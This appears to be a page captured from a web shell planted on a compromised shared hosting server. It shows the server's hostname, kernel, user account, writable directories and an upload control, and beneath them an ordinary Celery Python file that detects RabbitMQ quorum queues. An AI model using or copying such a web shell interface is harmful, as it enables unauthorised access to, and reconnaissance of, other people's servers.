Yohohohohohooho | Sanrei Aya
Sanrei Aya


Server : LiteSpeed
System : Linux barito.iixcp.rumahweb.net 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
User : elvh3918 ( 1528)
PHP Version : 8.2.31
Disable Function : mail
Directory :  /proc/thread-self/root/usr/local/lib/python3.9/site-packages/celery/utils/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/thread-self/root/usr/local/lib/python3.9/site-packages/celery/utils/quorum_queues.py
from __future__ import annotations


def detect_quorum_queues(app, driver_type: str) -> tuple[bool, str]:
    """Detect if any of the queues are quorum queues.

    Returns:
        tuple[bool, str]: A tuple containing a boolean indicating if any of the queues are quorum queues
        and the name of the first quorum queue found or an empty string if no quorum queues were found.
    """
    is_rabbitmq_broker = driver_type == 'amqp'

    if is_rabbitmq_broker:
        queues = app.amqp.queues
        for qname in queues:
            qarguments = queues[qname].queue_arguments or {}
            if qarguments.get("x-queue-type") == "quorum":
                return True, qname

    return False, ""

Yohohohohohooho | Sanrei Aya